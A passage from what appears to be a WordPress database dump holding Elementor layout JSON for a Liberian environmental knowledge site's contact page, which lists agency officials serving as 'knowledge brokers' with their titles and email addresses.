Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23090,3337,'_elementor_edit_mode','builder'),(23091,3337,'_elementor_template_type','wp-page'),(23092,3337,'_elementor_version','3.0.16'),(23093,3337,'_wp_page_template','default'),(23094,3337,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries 